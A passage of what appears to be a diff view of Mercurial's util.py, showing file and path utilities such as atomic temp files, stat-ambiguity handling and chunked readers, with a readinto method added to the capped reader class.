2058 This is imperfect because whether re2 or re is used for a particular
2059 function depends on the flags, etc, but it's the best we can do.
2059 function depends on the flags, etc, but it's the best we can do.
2060 '''
2060 '''
2061 global _re2
2061 global _re2
2062 if _re2 is None:
2062 if _re2 is None:
2063 self._checkre2()
2063 self._checkre2()
2064 if _re2:
2064 if _re2:
2065 return re2.escape
2065 return re2.escape
2066 else:
2066 else:
2067 return remod.escape
2067 return remod.escape
2068
2068
2069 re = _re()
2069 re = _re()
2070
2070
2071 _fspathcache = {}
2071 _fspathcache = {}
2072 def fspath(name, root):
2072 def fspath(name, root):
2073 '''Get name in the case stored in the filesystem
2073 '''Get name in the case stored in the filesystem
2074
2074
2075 The name should be relative to root, and be normcase-ed for efficiency.
2075 The name should be relative to root, and be normcase-ed for efficiency.
2076
2076
2077 Note that this function is unnecessary, and should not be
2077 Note that this function is unnecessary, and should not be
2078 called, for case-sensitive filesystems (simply because it's expensive).
2078 called, for case-sensitive filesystems (simply because it's expensive).
2079
2079
2080 The root should be normcase-ed, too.
2080 The root should be normcase-ed, too.
2081 '''
2081 '''
2082 def _makefspathcacheentry(dir):
2082 def _makefspathcacheentry(dir):
2083 return dict((normcase(n), n) for n in os.listdir(dir))
2083 return dict((normcase(n), n) for n in os.listdir(dir))
2084
2084
2085 seps = pycompat.ossep
2085 seps = pycompat.ossep
2086 if pycompat.osaltsep:
2086 if pycompat.osaltsep:
2087 seps = seps + pycompat.osaltsep
2087 seps = seps + pycompat.osaltsep
2088 # Protect backslashes. This gets silly very quickly.
2088 # Protect backslashes. This gets silly very quickly.
2089 seps.replace('\\','\\\\')
2089 seps.replace('\\','\\\\')
2090 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2090 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2091 dir = os.path.normpath(root)
2091 dir = os.path.normpath(root)
2092 result = []
2092 result = []
2093 for part, sep in pattern.findall(name):
2093 for part, sep in pattern.findall(name):
2094 if sep:
2094 if sep:
2095 result.append(sep)
2095 result.append(sep)
2096 continue
2096 continue
2097
2097
2098 if dir not in _fspathcache:
2098 if dir not in _fspathcache:
2099 _fspathcache[dir] = _makefspathcacheentry(dir)
2099 _fspathcache[dir] = _makefspathcacheentry(dir)
2100 contents = _fspathcache[dir]
2100 contents = _fspathcache[dir]
2101
2101
2102 found = contents.get(part)
2102 found = contents.get(part)
2103 if not found:
2103 if not found:
2104 # retry "once per directory" per "dirstate.walk" which
2104 # retry "once per directory" per "dirstate.walk" which
2105 # may take place for each patches of "hg qpush", for example
2105 # may take place for each patches of "hg qpush", for example
2106 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2106 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2107 found = contents.get(part)
2107 found = contents.get(part)
2108
2108
2109 result.append(found or part)
2109 result.append(found or part)
2110 dir = os.path.join(dir, part)
2110 dir = os.path.join(dir, part)
2111
2111
2112 return ''.join(result)
2112 return ''.join(result)
2113
2113
2114 def checknlink(testfile):
2114 def checknlink(testfile):
2115 '''check whether hardlink count reporting works properly'''
2115 '''check whether hardlink count reporting works properly'''
2116
2116
2117 # testfile may be open, so we need a separate file for checking to
2117 # testfile may be open, so we need a separate file for checking to
2118 # work around issue2543 (or testfile may get lost on Samba shares)
2118 # work around issue2543 (or testfile may get lost on Samba shares)
2119 f1, f2, fp = None, None, None
2119 f1, f2, fp = None, None, None
2120 try:
2120 try:
2121 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2121 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2122 suffix='1~', dir=os.path.dirname(testfile))
2122 suffix='1~', dir=os.path.dirname(testfile))
2123 os.close(fd)
2123 os.close(fd)
2124 f2 = '%s2~' % f1[:-2]
2124 f2 = '%s2~' % f1[:-2]
2125
2125
2126 oslink(f1, f2)
2126 oslink(f1, f2)
2127 # nlinks() may behave differently for files on Windows shares if
2127 # nlinks() may behave differently for files on Windows shares if
2128 # the file is open.
2128 # the file is open.
2129 fp = posixfile(f2)
2129 fp = posixfile(f2)
2130 return nlinks(f2) > 1
2130 return nlinks(f2) > 1
2131 except OSError:
2131 except OSError:
2132 return False
2132 return False
2133 finally:
2133 finally:
2134 if fp is not None:
2134 if fp is not None:
2135 fp.close()
2135 fp.close()
2136 for f in (f1, f2):
2136 for f in (f1, f2):
2137 try:
2137 try:
2138 if f is not None:
2138 if f is not None:
2139 os.unlink(f)
2139 os.unlink(f)
2140 except OSError:
2140 except OSError:
2141 pass
2141 pass
2142
2142
2143 def endswithsep(path):
2143 def endswithsep(path):
2144 '''Check path ends with os.sep or os.altsep.'''
2144 '''Check path ends with os.sep or os.altsep.'''
2145 return (path.endswith(pycompat.ossep)
2145 return (path.endswith(pycompat.ossep)
2146 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2146 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2147
2147
2148 def splitpath(path):
2148 def splitpath(path):
2149 '''Split path by os.sep.
2149 '''Split path by os.sep.
2150 Note that this function does not use os.altsep because this is
2150 Note that this function does not use os.altsep because this is
2151 an alternative of simple "xxx.split(os.sep)".
2151 an alternative of simple "xxx.split(os.sep)".
2152 It is recommended to use os.path.normpath() before using this
2152 It is recommended to use os.path.normpath() before using this
2153 function if need.'''
2153 function if need.'''
2154 return path.split(pycompat.ossep)
2154 return path.split(pycompat.ossep)
2155
2155
2156 def gui():
2156 def gui():
2157 '''Are we running in a GUI?'''
2157 '''Are we running in a GUI?'''
2158 if pycompat.isdarwin:
2158 if pycompat.isdarwin:
2159 if 'SSH_CONNECTION' in encoding.environ:
2159 if 'SSH_CONNECTION' in encoding.environ:
2160 # handle SSH access to a box where the user is logged in
2160 # handle SSH access to a box where the user is logged in
2161 return False
2161 return False
2162 elif getattr(osutil, 'isgui', None):
2162 elif getattr(osutil, 'isgui', None):
2163 # check if a CoreGraphics session is available
2163 # check if a CoreGraphics session is available
2164 return osutil.isgui()
2164 return osutil.isgui()
2165 else:
2165 else:
2166 # pure build; use a safe default
2166 # pure build; use a safe default
2167 return True
2167 return True
2168 else:
2168 else:
2169 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2169 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2170
2170
2171 def mktempcopy(name, emptyok=False, createmode=None):
2171 def mktempcopy(name, emptyok=False, createmode=None):
2172 """Create a temporary file with the same contents from name
2172 """Create a temporary file with the same contents from name
2173
2173
2174 The permission bits are copied from the original file.
2174 The permission bits are copied from the original file.
2175
2175
2176 If the temporary file is going to be truncated immediately, you
2176 If the temporary file is going to be truncated immediately, you
2177 can use emptyok=True as an optimization.
2177 can use emptyok=True as an optimization.
2178
2178
2179 Returns the name of the temporary file.
2179 Returns the name of the temporary file.
2180 """
2180 """
2181 d, fn = os.path.split(name)
2181 d, fn = os.path.split(name)
2182 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2182 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2183 os.close(fd)
2183 os.close(fd)
2184 # Temporary files are created with mode 0600, which is usually not
2184 # Temporary files are created with mode 0600, which is usually not
2185 # what we want. If the original file already exists, just copy
2185 # what we want. If the original file already exists, just copy
2186 # its mode. Otherwise, manually obey umask.
2186 # its mode. Otherwise, manually obey umask.
2187 copymode(name, temp, createmode)
2187 copymode(name, temp, createmode)
2188 if emptyok:
2188 if emptyok:
2189 return temp
2189 return temp
2190 try:
2190 try:
2191 try:
2191 try:
2192 ifp = posixfile(name, "rb")
2192 ifp = posixfile(name, "rb")
2193 except IOError as inst:
2193 except IOError as inst:
2194 if inst.errno == errno.ENOENT:
2194 if inst.errno == errno.ENOENT:
2195 return temp
2195 return temp
2196 if not getattr(inst, 'filename', None):
2196 if not getattr(inst, 'filename', None):
2197 inst.filename = name
2197 inst.filename = name
2198 raise
2198 raise
2199 ofp = posixfile(temp, "wb")
2199 ofp = posixfile(temp, "wb")
2200 for chunk in filechunkiter(ifp):
2200 for chunk in filechunkiter(ifp):
2201 ofp.write(chunk)
2201 ofp.write(chunk)
2202 ifp.close()
2202 ifp.close()
2203 ofp.close()
2203 ofp.close()
2204 except: # re-raises
2204 except: # re-raises
2205 try:
2205 try:
2206 os.unlink(temp)
2206 os.unlink(temp)
2207 except OSError:
2207 except OSError:
2208 pass
2208 pass
2209 raise
2209 raise
2210 return temp
2210 return temp
2211
2211
2212 class filestat(object):
2212 class filestat(object):
2213 """help to exactly detect change of a file
2213 """help to exactly detect change of a file
2214
2214
2215 'stat' attribute is result of 'os.stat()' if specified 'path'
2215 'stat' attribute is result of 'os.stat()' if specified 'path'
2216 exists. Otherwise, it is None. This can avoid preparative
2216 exists. Otherwise, it is None. This can avoid preparative
2217 'exists()' examination on client side of this class.
2217 'exists()' examination on client side of this class.
2218 """
2218 """
2219 def __init__(self, stat):
2219 def __init__(self, stat):
2220 self.stat = stat
2220 self.stat = stat
2221
2221
2222 @classmethod
2222 @classmethod
2223 def frompath(cls, path):
2223 def frompath(cls, path):
2224 try:
2224 try:
2225 stat = os.stat(path)
2225 stat = os.stat(path)
2226 except OSError as err:
2226 except OSError as err:
2227 if err.errno != errno.ENOENT:
2227 if err.errno != errno.ENOENT:
2228 raise
2228 raise
2229 stat = None
2229 stat = None
2230 return cls(stat)
2230 return cls(stat)
2231
2231
2232 @classmethod
2232 @classmethod
2233 def fromfp(cls, fp):
2233 def fromfp(cls, fp):
2234 stat = os.fstat(fp.fileno())
2234 stat = os.fstat(fp.fileno())
2235 return cls(stat)
2235 return cls(stat)
2236
2236
2237 __hash__ = object.__hash__
2237 __hash__ = object.__hash__
2238
2238
2239 def __eq__(self, old):
2239 def __eq__(self, old):
2240 try:
2240 try:
2241 # if ambiguity between stat of new and old file is
2241 # if ambiguity between stat of new and old file is
2242 # avoided, comparison of size, ctime and mtime is enough
2242 # avoided, comparison of size, ctime and mtime is enough
2243 # to exactly detect change of a file regardless of platform
2243 # to exactly detect change of a file regardless of platform
2244 return (self.stat.st_size == old.stat.st_size and
2244 return (self.stat.st_size == old.stat.st_size and
2245 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2245 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2246 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2246 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2247 except AttributeError:
2247 except AttributeError:
2248 pass
2248 pass
2249 try:
2249 try:
2250 return self.stat is None and old.stat is None
2250 return self.stat is None and old.stat is None
2251 except AttributeError:
2251 except AttributeError:
2252 return False
2252 return False
2253
2253
2254 def isambig(self, old):
2254 def isambig(self, old):
2255 """Examine whether new (= self) stat is ambiguous against old one
2255 """Examine whether new (= self) stat is ambiguous against old one
2256
2256
2257 "S[N]" below means stat of a file at N-th change:
2257 "S[N]" below means stat of a file at N-th change:
2258
2258
2259 - S[n-1].ctime < S[n].ctime: can detect change of a file
2259 - S[n-1].ctime < S[n].ctime: can detect change of a file
2260 - S[n-1].ctime == S[n].ctime
2260 - S[n-1].ctime == S[n].ctime
2261 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2261 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2262 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2262 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2263 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2263 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2264 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2264 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2265
2265
2266 Case (*2) above means that a file was changed twice or more at
2266 Case (*2) above means that a file was changed twice or more at
2267 same time in sec (= S[n-1].ctime), and comparison of timestamp
2267 same time in sec (= S[n-1].ctime), and comparison of timestamp
2268 is ambiguous.
2268 is ambiguous.
2269
2269
2270 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2270 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2271 timestamp is ambiguous".
2271 timestamp is ambiguous".
2272
2272
2273 But advancing mtime only in case (*2) doesn't work as
2273 But advancing mtime only in case (*2) doesn't work as
2274 expected, because naturally advanced S[n].mtime in case (*1)
2274 expected, because naturally advanced S[n].mtime in case (*1)
2275 might be equal to manually advanced S[n-1 or earlier].mtime.
2275 might be equal to manually advanced S[n-1 or earlier].mtime.
2276
2276
2277 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2277 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2278 treated as ambiguous regardless of mtime, to avoid overlooking
2278 treated as ambiguous regardless of mtime, to avoid overlooking
2279 by confliction between such mtime.
2279 by confliction between such mtime.
2280
2280
2281 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2281 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2282 S[n].mtime", even if size of a file isn't changed.
2282 S[n].mtime", even if size of a file isn't changed.
2283 """
2283 """
2284 try:
2284 try:
2285 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2285 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2286 except AttributeError:
2286 except AttributeError:
2287 return False
2287 return False
2288
2288
2289 def avoidambig(self, path, old):
2289 def avoidambig(self, path, old):
2290 """Change file stat of specified path to avoid ambiguity
2290 """Change file stat of specified path to avoid ambiguity
2291
2291
2292 'old' should be previous filestat of 'path'.
2292 'old' should be previous filestat of 'path'.
2293
2293
2294 This skips avoiding ambiguity, if a process doesn't have
2294 This skips avoiding ambiguity, if a process doesn't have
2295 appropriate privileges for 'path'. This returns False in this
2295 appropriate privileges for 'path'. This returns False in this
2296 case.
2296 case.
2297
2297
2298 Otherwise, this returns True, as "ambiguity is avoided".
2298 Otherwise, this returns True, as "ambiguity is avoided".
2299 """
2299 """
2300 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2300 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2301 try:
2301 try:
2302 os.utime(path, (advanced, advanced))
2302 os.utime(path, (advanced, advanced))
2303 except OSError as inst:
2303 except OSError as inst:
2304 if inst.errno == errno.EPERM:
2304 if inst.errno == errno.EPERM:
2305 # utime() on the file created by another user causes EPERM,
2305 # utime() on the file created by another user causes EPERM,
2306 # if a process doesn't have appropriate privileges
2306 # if a process doesn't have appropriate privileges
2307 return False
2307 return False
2308 raise
2308 raise
2309 return True
2309 return True
2310
2310
2311 def __ne__(self, other):
2311 def __ne__(self, other):
2312 return not self == other
2312 return not self == other
2313
2313
2314 class atomictempfile(object):
2314 class atomictempfile(object):
2315 '''writable file object that atomically updates a file
2315 '''writable file object that atomically updates a file
2316
2316
2317 All writes will go to a temporary copy of the original file. Call
2317 All writes will go to a temporary copy of the original file. Call
2318 close() when you are done writing, and atomictempfile will rename
2318 close() when you are done writing, and atomictempfile will rename
2319 the temporary copy to the original name, making the changes
2319 the temporary copy to the original name, making the changes
2320 visible. If the object is destroyed without being closed, all your
2320 visible. If the object is destroyed without being closed, all your
2321 writes are discarded.
2321 writes are discarded.
2322
2322
2323 checkambig argument of constructor is used with filestat, and is
2323 checkambig argument of constructor is used with filestat, and is
2324 useful only if target file is guarded by any lock (e.g. repo.lock
2324 useful only if target file is guarded by any lock (e.g. repo.lock
2325 or repo.wlock).
2325 or repo.wlock).
2326 '''
2326 '''
2327 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2327 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2328 self.__name = name # permanent name
2328 self.__name = name # permanent name
2329 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2329 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2330 createmode=createmode)
2330 createmode=createmode)
2331 self._fp = posixfile(self._tempname, mode)
2331 self._fp = posixfile(self._tempname, mode)
2332 self._checkambig = checkambig
2332 self._checkambig = checkambig
2333
2333
2334 # delegated methods
2334 # delegated methods
2335 self.read = self._fp.read
2335 self.read = self._fp.read
2336 self.write = self._fp.write
2336 self.write = self._fp.write
2337 self.seek = self._fp.seek
2337 self.seek = self._fp.seek
2338 self.tell = self._fp.tell
2338 self.tell = self._fp.tell
2339 self.fileno = self._fp.fileno
2339 self.fileno = self._fp.fileno
2340
2340
2341 def close(self):
2341 def close(self):
2342 if not self._fp.closed:
2342 if not self._fp.closed:
2343 self._fp.close()
2343 self._fp.close()
2344 filename = localpath(self.__name)
2344 filename = localpath(self.__name)
2345 oldstat = self._checkambig and filestat.frompath(filename)
2345 oldstat = self._checkambig and filestat.frompath(filename)
2346 if oldstat and oldstat.stat:
2346 if oldstat and oldstat.stat:
2347 rename(self._tempname, filename)
2347 rename(self._tempname, filename)
2348 newstat = filestat.frompath(filename)
2348 newstat = filestat.frompath(filename)
2349 if newstat.isambig(oldstat):
2349 if newstat.isambig(oldstat):
2350 # stat of changed file is ambiguous to original one
2350 # stat of changed file is ambiguous to original one
2351 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2351 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2352 os.utime(filename, (advanced, advanced))
2352 os.utime(filename, (advanced, advanced))
2353 else:
2353 else:
2354 rename(self._tempname, filename)
2354 rename(self._tempname, filename)
2355
2355
2356 def discard(self):
2356 def discard(self):
2357 if not self._fp.closed:
2357 if not self._fp.closed:
2358 try:
2358 try:
2359 os.unlink(self._tempname)
2359 os.unlink(self._tempname)
2360 except OSError:
2360 except OSError:
2361 pass
2361 pass
2362 self._fp.close()
2362 self._fp.close()
2363
2363
2364 def __del__(self):
2364 def __del__(self):
2365 if safehasattr(self, '_fp'): # constructor actually did something
2365 if safehasattr(self, '_fp'): # constructor actually did something
2366 self.discard()
2366 self.discard()
2367
2367
2368 def __enter__(self):
2368 def __enter__(self):
2369 return self
2369 return self
2370
2370
2371 def __exit__(self, exctype, excvalue, traceback):
2371 def __exit__(self, exctype, excvalue, traceback):
2372 if exctype is not None:
2372 if exctype is not None:
2373 self.discard()
2373 self.discard()
2374 else:
2374 else:
2375 self.close()
2375 self.close()
2376
2376
2377 def unlinkpath(f, ignoremissing=False):
2377 def unlinkpath(f, ignoremissing=False):
2378 """unlink and remove the directory if it is empty"""
2378 """unlink and remove the directory if it is empty"""
2379 if ignoremissing:
2379 if ignoremissing:
2380 tryunlink(f)
2380 tryunlink(f)
2381 else:
2381 else:
2382 unlink(f)
2382 unlink(f)
2383 # try removing directories that might now be empty
2383 # try removing directories that might now be empty
2384 try:
2384 try:
2385 removedirs(os.path.dirname(f))
2385 removedirs(os.path.dirname(f))
2386 except OSError:
2386 except OSError:
2387 pass
2387 pass
2388
2388
2389 def tryunlink(f):
2389 def tryunlink(f):
2390 """Attempt to remove a file, ignoring ENOENT errors."""
2390 """Attempt to remove a file, ignoring ENOENT errors."""
2391 try:
2391 try:
2392 unlink(f)
2392 unlink(f)
2393 except OSError as e:
2393 except OSError as e:
2394 if e.errno != errno.ENOENT:
2394 if e.errno != errno.ENOENT:
2395 raise
2395 raise
2396
2396
2397 def makedirs(name, mode=None, notindexed=False):
2397 def makedirs(name, mode=None, notindexed=False):
2398 """recursive directory creation with parent mode inheritance
2398 """recursive directory creation with parent mode inheritance
2399
2399
2400 Newly created directories are marked as "not to be indexed by
2400 Newly created directories are marked as "not to be indexed by
2401 the content indexing service", if ``notindexed`` is specified
2401 the content indexing service", if ``notindexed`` is specified
2402 for "write" mode access.
2402 for "write" mode access.
2403 """
2403 """
2404 try:
2404 try:
2405 makedir(name, notindexed)
2405 makedir(name, notindexed)
2406 except OSError as err:
2406 except OSError as err:
2407 if err.errno == errno.EEXIST:
2407 if err.errno == errno.EEXIST:
2408 return
2408 return
2409 if err.errno != errno.ENOENT or not name:
2409 if err.errno != errno.ENOENT or not name:
2410 raise
2410 raise
2411 parent = os.path.dirname(os.path.abspath(name))
2411 parent = os.path.dirname(os.path.abspath(name))
2412 if parent == name:
2412 if parent == name:
2413 raise
2413 raise
2414 makedirs(parent, mode, notindexed)
2414 makedirs(parent, mode, notindexed)
2415 try:
2415 try:
2416 makedir(name, notindexed)
2416 makedir(name, notindexed)
2417 except OSError as err:
2417 except OSError as err:
2418 # Catch EEXIST to handle races
2418 # Catch EEXIST to handle races
2419 if err.errno == errno.EEXIST:
2419 if err.errno == errno.EEXIST:
2420 return
2420 return
2421 raise
2421 raise
2422 if mode is not None:
2422 if mode is not None:
2423 os.chmod(name, mode)
2423 os.chmod(name, mode)
2424
2424
2425 def readfile(path):
2425 def readfile(path):
2426 with open(path, 'rb') as fp:
2426 with open(path, 'rb') as fp:
2427 return fp.read()
2427 return fp.read()
2428
2428
2429 def writefile(path, text):
2429 def writefile(path, text):
2430 with open(path, 'wb') as fp:
2430 with open(path, 'wb') as fp:
2431 fp.write(text)
2431 fp.write(text)
2432
2432
2433 def appendfile(path, text):
2433 def appendfile(path, text):
2434 with open(path, 'ab') as fp:
2434 with open(path, 'ab') as fp:
2435 fp.write(text)
2435 fp.write(text)
2436
2436
2437 class chunkbuffer(object):
2437 class chunkbuffer(object):
2438 """Allow arbitrary sized chunks of data to be efficiently read from an
2438 """Allow arbitrary sized chunks of data to be efficiently read from an
2439 iterator over chunks of arbitrary size."""
2439 iterator over chunks of arbitrary size."""
2440
2440
2441 def __init__(self, in_iter):
2441 def __init__(self, in_iter):
2442 """in_iter is the iterator that's iterating over the input chunks."""
2442 """in_iter is the iterator that's iterating over the input chunks."""
2443 def splitbig(chunks):
2443 def splitbig(chunks):
2444 for chunk in chunks:
2444 for chunk in chunks:
2445 if len(chunk) > 2**20:
2445 if len(chunk) > 2**20:
2446 pos = 0
2446 pos = 0
2447 while pos < len(chunk):
2447 while pos < len(chunk):
2448 end = pos + 2 ** 18
2448 end = pos + 2 ** 18
2449 yield chunk[pos:end]
2449 yield chunk[pos:end]
2450 pos = end
2450 pos = end
2451 else:
2451 else:
2452 yield chunk
2452 yield chunk
2453 self.iter = splitbig(in_iter)
2453 self.iter = splitbig(in_iter)
2454 self._queue = collections.deque()
2454 self._queue = collections.deque()
2455 self._chunkoffset = 0
2455 self._chunkoffset = 0
2456
2456
2457 def read(self, l=None):
2457 def read(self, l=None):
2458 """Read L bytes of data from the iterator of chunks of data.
2458 """Read L bytes of data from the iterator of chunks of data.
2459 Returns less than L bytes if the iterator runs dry.
2459 Returns less than L bytes if the iterator runs dry.
2460
2460
2461 If size parameter is omitted, read everything"""
2461 If size parameter is omitted, read everything"""
2462 if l is None:
2462 if l is None:
2463 return ''.join(self.iter)
2463 return ''.join(self.iter)
2464
2464
2465 left = l
2465 left = l
2466 buf = []
2466 buf = []
2467 queue = self._queue
2467 queue = self._queue
2468 while left > 0:
2468 while left > 0:
2469 # refill the queue
2469 # refill the queue
2470 if not queue:
2470 if not queue:
2471 target = 2**18
2471 target = 2**18
2472 for chunk in self.iter:
2472 for chunk in self.iter:
2473 queue.append(chunk)
2473 queue.append(chunk)
2474 target -= len(chunk)
2474 target -= len(chunk)
2475 if target <= 0:
2475 if target <= 0:
2476 break
2476 break
2477 if not queue:
2477 if not queue:
2478 break
2478 break
2479
2479
2480 # The easy way to do this would be to queue.popleft(), modify the
2480 # The easy way to do this would be to queue.popleft(), modify the
2481 # chunk (if necessary), then queue.appendleft(). However, for cases
2481 # chunk (if necessary), then queue.appendleft(). However, for cases
2482 # where we read partial chunk content, this incurs 2 dequeue
2482 # where we read partial chunk content, this incurs 2 dequeue
2483 # mutations and creates a new str for the remaining chunk in the
2483 # mutations and creates a new str for the remaining chunk in the
2484 # queue. Our code below avoids this overhead.
2484 # queue. Our code below avoids this overhead.
2485
2485
2486 chunk = queue[0]
2486 chunk = queue[0]
2487 chunkl = len(chunk)
2487 chunkl = len(chunk)
2488 offset = self._chunkoffset
2488 offset = self._chunkoffset
2489
2489
2490 # Use full chunk.
2490 # Use full chunk.
2491 if offset == 0 and left >= chunkl:
2491 if offset == 0 and left >= chunkl:
2492 left -= chunkl
2492 left -= chunkl
2493 queue.popleft()
2493 queue.popleft()
2494 buf.append(chunk)
2494 buf.append(chunk)
2495 # self._chunkoffset remains at 0.
2495 # self._chunkoffset remains at 0.
2496 continue
2496 continue
2497
2497
2498 chunkremaining = chunkl - offset
2498 chunkremaining = chunkl - offset
2499
2499
2500 # Use all of unconsumed part of chunk.
2500 # Use all of unconsumed part of chunk.
2501 if left >= chunkremaining:
2501 if left >= chunkremaining:
2502 left -= chunkremaining
2502 left -= chunkremaining
2503 queue.popleft()
2503 queue.popleft()
2504 # offset == 0 is enabled by block above, so this won't merely
2504 # offset == 0 is enabled by block above, so this won't merely
2505 # copy via ``chunk[0:]``.
2505 # copy via ``chunk[0:]``.
2506 buf.append(chunk[offset:])
2506 buf.append(chunk[offset:])
2507 self._chunkoffset = 0
2507 self._chunkoffset = 0
2508
2508
2509 # Partial chunk needed.
2509 # Partial chunk needed.
2510 else:
2510 else:
2511 buf.append(chunk[offset:offset + left])
2511 buf.append(chunk[offset:offset + left])
2512 self._chunkoffset += left
2512 self._chunkoffset += left
2513 left -= chunkremaining
2513 left -= chunkremaining
2514
2514
2515 return ''.join(buf)
2515 return ''.join(buf)
2516
2516
2517 def filechunkiter(f, size=131072, limit=None):
2517 def filechunkiter(f, size=131072, limit=None):
2518 """Create a generator that produces the data in the file size
2518 """Create a generator that produces the data in the file size
2519 (default 131072) bytes at a time, up to optional limit (default is
2519 (default 131072) bytes at a time, up to optional limit (default is
2520 to read all data). Chunks may be less than size bytes if the
2520 to read all data). Chunks may be less than size bytes if the
2521 chunk is the last chunk in the file, or the file is a socket or
2521 chunk is the last chunk in the file, or the file is a socket or
2522 some other type of file that sometimes reads less data than is
2522 some other type of file that sometimes reads less data than is
2523 requested."""
2523 requested."""
2524 assert size >= 0
2524 assert size >= 0
2525 assert limit is None or limit >= 0
2525 assert limit is None or limit >= 0
2526 while True:
2526 while True:
2527 if limit is None:
2527 if limit is None:
2528 nbytes = size
2528 nbytes = size
2529 else:
2529 else:
2530 nbytes = min(limit, size)
2530 nbytes = min(limit, size)
2531 s = nbytes and f.read(nbytes)
2531 s = nbytes and f.read(nbytes)
2532 if not s:
2532 if not s:
2533 break
2533 break
2534 if limit:
2534 if limit:
2535 limit -= len(s)
2535 limit -= len(s)
2536 yield s
2536 yield s
2537
2537
2538 class cappedreader(object):
2538 class cappedreader(object):
2539 """A file object proxy that allows reading up to N bytes.
2539 """A file object proxy that allows reading up to N bytes.
2540
2540
2541 Given a source file object, instances of this type allow reading up to
2541 Given a source file object, instances of this type allow reading up to
2542 N bytes from that source file object. Attempts to read past the allowed
2542 N bytes from that source file object. Attempts to read past the allowed
2543 limit are treated as EOF.
2543 limit are treated as EOF.
2544
2544
2545 It is assumed that I/O is not performed on the original file object
2545 It is assumed that I/O is not performed on the original file object
2546 in addition to I/O that is performed by this instance. If there is,
2546 in addition to I/O that is performed by this instance. If there is,
2547 state tracking will get out of sync and unexpected results will ensue.
2547 state tracking will get out of sync and unexpected results will ensue.
2548 """
2548 """
2549 def __init__(self, fh, limit):
2549 def __init__(self, fh, limit):
2550 """Allow reading up to <limit> bytes from <fh>."""
2550 """Allow reading up to <limit> bytes from <fh>."""
2551 self._fh = fh
2551 self._fh = fh
2552 self._left = limit
2552 self._left = limit
2553
2553
2554 def read(self, n=-1):
2554 def read(self, n=-1):
2555 if not self._left:
2555 if not self._left:
2556 return b''
2556 return b''
2557
2557
2558 if n < 0:
2558 if n < 0:
2559 n = self._left
2559 n = self._left
2560
2560
2561 data = self._fh.read(min(n, self._left))
2561 data = self._fh.read(min(n, self._left))
2562 self._left -= len(data)
2562 self._left -= len(data)
2563 assert self._left >= 0
2563 assert self._left >= 0
2564
2564
2565 return data
2565 return data
2566
2566
2567 def readinto(self, b):
2568 res = self.read(len(b))
2569 if res is None:
2570 return None
2571
2572 b[0:len(res)] = res
2573 return len(res)
2574
2567 def stringmatcher(pattern, casesensitive=True):
2575 def stringmatcher(pattern, casesensitive=True):
2568 """
2576 """
2569 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2577 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2570 returns the matcher name, pattern, and matcher function.
2578 returns the matcher name, pattern, and matcher function.
2571 missing or unknown prefixes are treated as literal matches.
2579 missing or unknown prefixes are treated as literal matches.
2572
2580
2573 helper for tests:
2581 helper for tests:
2574 >>> def test(pattern, *tests):
2582 >>> def test(pattern, *tests):
2575 ... kind, pattern, matcher = stringmatcher(pattern)
2583 ... kind, pattern, matcher = stringmatcher(pattern)
2576 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2584 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2577 >>> def itest(pattern, *tests):
2585 >>> def itest(pattern, *tests):
2578 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2586 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2579 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2587 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2580
2588
2581 exact matching (no prefix):
2589 exact matching (no prefix):
2582 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2590 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2583 ('literal', 'abcdefg', [False, False, True])
2591 ('literal', 'abcdefg', [False, False, True])
2584
2592
2585 regex matching ('re:' prefix)
2593 regex matching ('re:' prefix)
2586 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2594 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2587 ('re', 'a.+b', [False, False, True])
2595 ('re', 'a.+b', [False, False, True])
